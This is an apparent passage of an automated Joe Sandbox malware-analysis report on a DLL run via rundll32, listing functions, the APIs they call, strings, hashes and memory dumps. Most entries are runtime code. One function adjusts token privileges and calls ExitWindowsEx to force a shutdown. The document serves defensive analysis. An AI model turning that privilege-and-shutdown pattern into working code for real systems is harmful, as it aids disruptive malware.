Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: DisableInfoLocalePrintScreen@@
String ID:
API String ID: 3878740904-0
Opcode ID: 14b17a4b88f3e6b77282140b40bb5bf452a629801ca5740cb9b4a38c41233d0f
Instruction ID: 0de9fcde0ce06a8ec983f84e7f887d5372b6bd8b08b4f9d019eb4628c1e418df
Opcode Fuzzy Hash: 14b17a4b88f3e6b77282140b40bb5bf452a629801ca5740cb9b4a38c41233d0f
Instruction Fuzzy Hash: CCE04F3190866CFBDF126F61CC08BAE3E39EF4AB60F454015FD1466161CB33D9219AE5

Function 6D0470F0 Relevance: 3.0, APIs: 2, Instructions: 20encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040), ref: 6D047101
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 6D04711A

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Crypt$AcquireContextCreateHash
String ID:
API String ID: 1914063823-0
Opcode ID: 9f020effcde5153b2c3674aa8f10c9c1a8fc295e4e5b03a41c42cf3a2b5b2011
Instruction ID: 236b8417f62f4a7eb4a03bc8078e726801b52077d02a41c03a3f7559e55dd352
Opcode Fuzzy Hash: 9f020effcde5153b2c3674aa8f10c9c1a8fc295e4e5b03a41c42cf3a2b5b2011
Instruction Fuzzy Hash: 9BE01731288220BAFA205B119C06F9A77A8AB0AB10F208514B340FA0D0C7A1A4008BA8

Function 6D02A1B0 Relevance: 2.7, Strings: 2, Instructions: 244COMMON

Download Yara Rule

Strings

Can't get the size of %s, xrefs: 6D02A2AC
Can't open %s for writing, xrefs: 6D02A238

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: Can't get the size of %s$Can't open %s for writing
API String ID: 0-3544860555
Opcode ID: 9a9dd1f8ce7d33c376ef7a972b3edacafec9cff7952e24206d1a638e5b23bf7e
Instruction ID: 129098c9452279ab4ccd5c890eaa00da73bad808c2061f55fac291fab1333a4d
Opcode Fuzzy Hash: 9a9dd1f8ce7d33c376ef7a972b3edacafec9cff7952e24206d1a638e5b23bf7e
Instruction Fuzzy Hash: 0281B671A097019BF700DB68DC81F6AB7E5FFC8218F54493DF65983241EF26A958C782

Function 6D05D7A6 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D05D7A1,?,?,00000008,?,?,6D06E72F,00000000), ref: 6D05D9D3

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 8c849dba4c9964585384d8ade5b9f67bb1aed2d21f9fa5e71076d4c2e1acc477
Instruction ID: d9e3ed215615e9c1d7754e5639b88eba327944da2ebeac6715b701b1233a8c40
Opcode Fuzzy Hash: 8c849dba4c9964585384d8ade5b9f67bb1aed2d21f9fa5e71076d4c2e1acc477
Instruction Fuzzy Hash: 49B15E315206099FE705CF28C586BA57BE0FF85364F258699ECE9CF2A1C336D9A1CB50

Function 6D04915C Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D049172

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: ffd4bb1c1d4d9fa69074003c1c5dfed34b787c39c9d4bfc72e27c7fb60087230
Instruction ID: 9003d52a3939ea164f745f719232eb678a96f9601458816df0cd13750870ad4e
Opcode Fuzzy Hash: ffd4bb1c1d4d9fa69074003c1c5dfed34b787c39c9d4bfc72e27c7fb60087230
Instruction Fuzzy Hash: 0FA148B1D01605CBEF04DF54E6A5BAABBF0FB8A765F24813EE415EB680D3749940CB50

Function 6D0668DA Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfb22b6a1b75882612aa6ee9201d4606f6148f6f3959486b854e4901ae954902
Instruction ID: c557f5b71c260e1926e30a2f165000561053bcd5dc9956d054d6ce7c1a178164
Opcode Fuzzy Hash: dfb22b6a1b75882612aa6ee9201d4606f6148f6f3959486b854e4901ae954902
Instruction Fuzzy Hash: 714194B580425DAFDB10DF69CC88BEABBB9EF45304F5442D9E519A3200DB319E448F60

Function 6D01C750 Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

BCryptGenRandom.BCRYPT(00000000,?), ref: 6D01C7FF

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CryptRandom
String ID:
API String ID: 2662593985-0
Opcode ID: 49e35172a62acfb489d07b117e99d6aa5324693e95b7ec1bfc9bcdd5dfb1405f
Instruction ID: 370677b6cf93b3ac9409b256136a67f191c8e0fa04d152161a7ac7b59e0652e6
Opcode Fuzzy Hash: 49e35172a62acfb489d07b117e99d6aa5324693e95b7ec1bfc9bcdd5dfb1405f
Instruction Fuzzy Hash: E641E27160C3469FF724CE68C891B7AB7E1EB86304F44843EE899C7282DB75C8488796

Function 6D06B800 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D06B854

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 88a58c7310eaf56a8af90d17bcb7c92f1262e92dc8725ad7a55bcbf22c2df9d3
Instruction ID: 9a1d04c28dadf7d5ade4e468ec585a299a2441fcacff05177f30a250bd248604
Opcode Fuzzy Hash: 88a58c7310eaf56a8af90d17bcb7c92f1262e92dc8725ad7a55bcbf22c2df9d3
Instruction Fuzzy Hash: 56218EB2618296AFFB189B29D851BBA77F8EF45314B14407AFE01D7180EB75E940CB60

Function 6D04F0E1 Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

0, xrefs: 6D04F251

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9ec18a7984f13714760f87a49dcbbddfa205da87c1b2d10fe5b7ee4f10c0f536
Instruction ID: 0f2bfd56f108e748e6f8089496d5008ac8b2a10274945b92a1bf1b10a8be4344
Opcode Fuzzy Hash: 9ec18a7984f13714760f87a49dcbbddfa205da87c1b2d10fe5b7ee4f10c0f536
Instruction Fuzzy Hash: 84C1DB34A08687DEF711CF68C590F7ABFF9BB46314F00C679D962976A0C721A946CB50

Function 6D06B487 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7

EnumSystemLocalesW.KERNEL32(6D06B5AD,00000001,00000000,?,-00000050,?,6D06BBE1,00000000,?,?,?,00000055,?), ref: 6D06B4F9

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 1ae4b4ba872e613f0a4beae482ff7069fb674afe6eb3d3eef5914ac4d5cf4029
Instruction ID: f2f10f28db703b1becc49c2c174a633781f86b05afacc632ce9139cfd527cb3c
Opcode Fuzzy Hash: 1ae4b4ba872e613f0a4beae482ff7069fb674afe6eb3d3eef5914ac4d5cf4029
Instruction Fuzzy Hash: E111E9762047055FEB189F39C8A07BAB7A1FF84369B15452CE94687A40E371A543C750

Function 6D01C690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

BCryptGenRandom.BCRYPT(00000000,?), ref: 6D01C6EC

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CryptRandom
String ID:
API String ID: 2662593985-0
Opcode ID: ab48ef06829b1e9ac0176133a97703d53b63b35dfdc05384b7432a00acc22324
Instruction ID: b004d9c1816027ec0a1293f9bceab382e9dffb359c95302ce47ec3763600d38c
Opcode Fuzzy Hash: ab48ef06829b1e9ac0176133a97703d53b63b35dfdc05384b7432a00acc22324
Instruction Fuzzy Hash: 921102B160C3069AF704CE65D891B3BB7F8EBC6714F00053EEA42C7280D7B0D8468B5A

Function 6D06BA2F Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6D06B7C9,00000000,00000000,?), ref: 6D06BA5B

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 33200279aff37195c1648dbdc80b6b0796542b15beac1c2967324dcb56b6fcf9
Instruction ID: c76df9c5634aa2b3ff789cbdec2f00f6a9899a850f7b29da076ef94ab2ef94b6
Opcode Fuzzy Hash: 33200279aff37195c1648dbdc80b6b0796542b15beac1c2967324dcb56b6fcf9
Instruction Fuzzy Hash: A101F9B2A14157BFFB189B6588467FE37A8FB40354F014429FD16A7180EA70FD41C6B0

Function 6D06B395 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D06B3E9

Strings

utf8, xrefs: 6D06B358

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: d1b2ea73d9f11b3fc18ee8e239884f2223eaf32d8e61b23b8e3191c184fd2d84
Instruction ID: 4a0d535287dc85ca3c955ec85d0a4381054313c23d5a055629c1f02e53887ef5
Opcode Fuzzy Hash: d1b2ea73d9f11b3fc18ee8e239884f2223eaf32d8e61b23b8e3191c184fd2d84
Instruction Fuzzy Hash: A6F0F432654245ABEB08AB39D844BBA33ECEB46324F01007AFB06D7280DB74AD058760

Function 6D06B522 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7

EnumSystemLocalesW.KERNEL32(6D06B800,00000001,00000002,?,-00000050,?,6D06BBA9,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6D06B56C

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f6675af33ec5acf396cb7dfd09f245ef210476c11b8387053fef1bb09435f262
Instruction ID: 0a32b3bc3fcee0de397a1164c2434a834d7c15614a8650714016e081ee6a5e81
Opcode Fuzzy Hash: f6675af33ec5acf396cb7dfd09f245ef210476c11b8387053fef1bb09435f262
Instruction Fuzzy Hash: FFF0F6762083495FE7145F399880BBA7BE1EF81368B05842CFA454B690E7729942CB60

Function 6D062DFA Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D051424: EnterCriticalSection.KERNEL32(-0003BF1A,?,6D0608ED,?,6D086D40,00000008,6D060AB1,?,6D04EA46,?,?,6D04EA46,?,?,6D04FC59), ref: 6D051433

EnumSystemLocalesW.KERNEL32(6D062DED,00000001,6D086E60,0000000C,6D063262,00000000), ref: 6D062E32

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: f0e4e1de8c8f9700618fdfdded0b2db7d172e2f10e3221f57493261cb22c2045
Instruction ID: c2ce7c1f691083ec060b1ed1b5377f2f3c086a7bdd9900e0eedf05d911498ff1
Opcode Fuzzy Hash: f0e4e1de8c8f9700618fdfdded0b2db7d172e2f10e3221f57493261cb22c2045
Instruction Fuzzy Hash: 1CF04976A04214EFEB10DFA9D400B9C77F0EB46325F11812AE510AB2D1DB755900CF50

Function 6D06B43C Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7

EnumSystemLocalesW.KERNEL32(6D06B395,00000001,00000002,?,?,6D06BC03,-00000050,?,?,?,00000055,?,-00000050,?,?,00000002), ref: 6D06B473

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: eb96275dd3a3b40a2d4a25a8e25fa12134f0281c9b348235524bc619bf3556af
Instruction ID: bf66f7a8ff41683289dff6ba2c617fcb41c5a323e9c79d5af15692330092ba9c
Opcode Fuzzy Hash: eb96275dd3a3b40a2d4a25a8e25fa12134f0281c9b348235524bc619bf3556af
Instruction Fuzzy Hash: 19F0E53630824557DB049F3AD85476ABFA5EFC2724B074059FF098B680D6B19982D7A0

Function 6D01C8D0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

BCryptGenRandom.BCRYPT(00000000,?,?,00000002), ref: 6D01C8EE

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CryptRandom
String ID:
API String ID: 2662593985-0
Opcode ID: f8b007f93f9d3c4f250129a8cf06282ee7b479751a796d7f7b0bca16e9284948
Instruction ID: 3052fbfb8a65fe4a48bec1831a012ab24e58706975b102a75ac9ee8f7b3b8f72
Opcode Fuzzy Hash: f8b007f93f9d3c4f250129a8cf06282ee7b479751a796d7f7b0bca16e9284948
Instruction Fuzzy Hash: 6BD0C93A598205BAEB121AA0EC03F0A7B91AB84B18F91C928B359550F1D2B684249702

Function 04EC5930 Relevance: 1.5, APIs: 1, Instructions: 14shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 04EC3260: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 04EC327E
Part of subcall function 04EC3260: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 04EC3292
Part of subcall function 04EC3260: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 04EC329D
Part of subcall function 04EC3260: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 04EC32A8
Part of subcall function 04EC3260: LoadLibraryA.KERNEL32(kernel32.dll), ref: 04EC32B2
Part of subcall function 04EC3260: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04EC32C1

ExitWindowsEx.USER32(?,00000000), ref: 04EC5944

Part of subcall function 04EC3260: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 04EC331B
Part of subcall function 04EC3260: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 04EC3327
Part of subcall function 04EC3260: CloseHandle.KERNEL32(?), ref: 04EC3337
Part of subcall function 04EC3260: FreeLibrary.KERNEL32(00000000), ref: 04EC3348
Part of subcall function 04EC3260: FreeLibrary.KERNEL32(?), ref: 04EC3352

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
String ID:
API String ID: 3789203340-0
Opcode ID: fe40b52feabcc9b1a2925cb34fc7eff19a4f972b30da4bd50e8c0ab0e4b51ba4
Instruction ID: 8fa57acc3d0756c22d6a0bbb357b3519ebdec945fa7c8f4d26fd01a5c71caa68
Opcode Fuzzy Hash: fe40b52feabcc9b1a2925cb34fc7eff19a4f972b30da4bd50e8c0ab0e4b51ba4
Instruction Fuzzy Hash: 5DC012B120C20827EE0C27B9E80AB9E769CCF04714F10801DB5098A181CC66B4410198

Function 6D0449C0 Relevance: 1.5, APIs: 1, Instructions: 7encryptionCOMMON

Download Yara Rule

APIs

CryptHashData.ADVAPI32(?,?,?,00000000), ref: 6D0449D1

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CryptDataHash
String ID:
API String ID: 4245837645-0
Opcode ID: b27caecfd4715c4549a451bfa4104a20475345a28dc0dced3c432b39bc7e6436
Instruction ID: 58d4d757c78782ac48ab520d073437364c71dc96ff947bf2b94c5469767731c8
Opcode Fuzzy Hash: b27caecfd4715c4549a451bfa4104a20475345a28dc0dced3c432b39bc7e6436
Instruction Fuzzy Hash: B9C04C31108345AFCF11CF40CD05F1DBBB1BB85700F144C48B29455060C372D414EB01

Function 6D037CC0 Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

%lx, xrefs: 6D037E6E

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: %lx
API String ID: 0-1448181948
Opcode ID: b80a918e34f723396fe975ad405a71951f6380499df556aa73ae5c0e2959c89b
Instruction ID: ebcf4daeacc23893b0c6d013f5387bd691c57f37ea4b9ada3faf33d7d771d256
Opcode Fuzzy Hash: b80a918e34f723396fe975ad405a71951f6380499df556aa73ae5c0e2959c89b
Instruction Fuzzy Hash: 4A81E632E087638BE715CE2CC48036EB7E1ABC9324F164B2DE5A5872D5E7719949C782

Function 6D06AC46 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

